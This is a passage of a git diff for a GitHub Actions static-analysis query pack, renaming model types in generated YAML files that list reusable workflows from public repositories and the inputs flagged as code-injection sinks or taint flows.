actionsSinkModel data: - ["getsentry/sentry-unity/.github/workflows/sdk.yml", "*", "input.target", "code-injection", "generated"] - ["getsentry/sentry-unity/.github/workflows/android-smoke-test.yml", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml index a914aa631c3..99c706b0c28 100644 --- a/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gitpod-io_gitpod.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gitpod-io/gitpod/.github/workflows/jetbrains-auto-update-template.yml", "*", "input.productId", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml index d0fe6b0eff5..f8d0172d684 100644 --- a/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion/.github/workflows/_artifacts_linux.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml index 3d3a4de2946..5afda471f8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules/.github/workflows/build-downstream.yml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml index 4c58af6969d..4e5ca50ccec 100644 --- a/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/googlecloudplatform_nodejs-docs-samples.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.path", "code-injection", "generated"] - ["googlecloudplatform/nodejs-docs-samples/.github/workflows/test.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml index 8629f279891..02801615bd5 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport/.github/workflows/update-ami-ids.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml index 4a6bbd77ec9..d808d612857 100644 --- a/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/gravitl_netmaker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitl/netmaker/.github/workflows/publish-docker.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml index c22998ee52a..e543dc8b7f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/h2oai_wave.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.build-version", "code-injection", "generated"] - ["h2oai/wave/.github/workflows/wave-bundle-docker-build-publish.yaml", "*", "input.wave-app-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml index c74922e61dc..891d902f470 100644 --- a/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hadashia_vcontainer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.dry-run", "code-injection", "generated"] - ["hadashia/vcontainer/.github/workflows/update-version-number.yaml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml index c9c7e8318f7..334d64dfbec 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"] - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml index 169094c3eb3..2c600cd7f7d 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_boundary.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/boundary/.github/workflows/test-cli-ui_oss.yml", "*", "input.artifact-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml index 6e4e4f4f1e9..cc6c4e620e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_consul.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.package-names-command", "code-injection", "generated"] - ["hashicorp/consul/.github/workflows/reusable-unit.yml", "*", "input.go-test-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml index dbc26ef9f04..efbf050ddc9 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-cdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-cdk/.github/workflows/unit.yml", "*", "input.package", "code-injection", "generated"] - ["hashicorp/terraform-cdk/.github/workflows/registry-docs-pr-based.yml", "*", "input.gitUser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml index c69de7cfcc2..9860bd3ab92 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform-provider-tfe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform-provider-tfe/.github/workflows/jira-issue-sync.yml", "*", "input.issue-extra-fields", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml index 685b0b144c9..c160c29f6f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_terraform.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.product-version", "code-injection", "generated"] - ["hashicorp/terraform/.github/workflows/build-terraform-cli.yml", "*", "input.package-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml index 9e3fc5cdc4f..910715eece0 100644 --- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-max", "code-injection", "generated"] - ["hashicorp/vault/.github/workflows/test-run-enos-scenario-matrix.yml", "*", "input.sample-name", "code-injection", "generated"] @@ -16,7 +16,7 @@ extensions: - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "input.storage_backend", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"] - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml index 4cd6cd8f591..f04e67670d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/heroku_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["heroku/cli/.github/workflows/publish-npm.yml", "*", "input.isStableRelease", "code-injection", "generated"] - ["heroku/cli/.github/workflows/promote.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml index 01726410e18..3d5fa057987 100644 --- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml @@ -1,13 +1,13 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.project_name", "code-injection", "generated"] - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "input.dependency_track_url", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"] - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml index 90e61bcf11a..31d0e691e7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/home-assistant_operating-system.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["home-assistant/operating-system/.github/workflows/test.yaml", "*", "input.version", "code-injection", "generated"] - ["home-assistant/operating-system/.github/workflows/artifacts-index.yaml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml index b4e1ff8155a..5f9da314f90 100644 --- a/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/homuler_mediapipeunityplugin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.windowsBuildArgs", "code-injection", "generated"] - ["homuler/mediapipeunityplugin/.github/workflows/package.yml", "*", "input.bazelBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 3621105b74e..7ae494adb2b 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index b6660df1c9b..dce969719d2 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index ead0bcfab16..cd5d5ff7d0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 6f9a12e9069..fd17e601d80 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 8ac32e4a7b7..bed40dce429 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 3c21fcad386..62a12e47138 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index e0d2508932f..7491c4f951a 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 96830183506..1876f1146cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 7f9299eb4d3..4a8534429f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 7a79d4c1e09..ecac3f22f85 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 55888f48551..ffc4193edbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index ea453ec4811..93b29308ff2 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 39005b693e7..c5965c5d8ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 4b485083191..1fc5159e55a 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index f45709cfa0f..bce14a98edd 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 1d8dc84c2f0..0439d6e1d4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index f404aa73762..357e11b3c0b 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 2f546ce3f57..4d3ea1e9156 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 9e8b1e43993..44b905cab67 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 20a24a4ec7f..192d975ea57 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 666a86caf88..627fca5d3ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index d4926952f1a..4d4fd0f229e 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 144c16ff8de..1ceacd2f1c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index f97ee81bcb9..ba0f5c06a67 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ 